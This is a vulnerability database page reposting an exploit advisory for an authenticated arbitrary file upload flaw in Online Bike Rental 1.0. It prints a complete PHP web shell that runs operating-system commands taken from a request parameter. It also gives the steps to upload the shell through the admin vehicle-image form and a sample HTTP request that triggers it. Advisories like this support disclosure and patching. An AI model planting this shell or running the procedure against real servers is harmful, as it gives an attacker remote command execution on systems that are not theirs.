Vulners
Lucene search
Online Bike Rental 1.0 Shell Upload Vulnerability
# Exploit Title: Online Bike Rental v1.0 – (Authenticated) Arbitrary File Upload / Remote Code Execution
# Exploit Author: Adeeb Shah (@hyd3sec)
# Vendor Homepage: https:/www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14374/online-bike-rental-phpmysql.html
# Version: 1.0
# Tested on: Windows 10 (x64_86) + XAMPP 7.4.4
Online Bike Rental has an authenticated (admin) arbitrary file upload vulnerability that allows for remote code execution.
1. Create a malicious PHP file with this content:
<?php
if(isset($_REQUEST[‘cmd’])){
echo “<pre>”;
$cmd = ($_REQUEST[‘cmd’]);
system($cmd);
echo “</pre>”;
die;
}
?>
2. Authenticate as admin via admin portal; navigate to manage vehicles and upload malicious php. Navigate to uploaded file path to execute php code.
GET /bikerental%20PHP/bikerental/admin/img/vehicleimages/backdoor.php?cmd=whoami HTTP/1.1
Host: 192.168.222.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: style=purple; PHPSESSID=2lpoqi5jmbeiabqemraesot9nh
Upgrade-Insecure-Requests: 1
# 0day.today [2020-08-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Aug 2020 00:00Current
0.1Low risk
Vulners AI Score0.1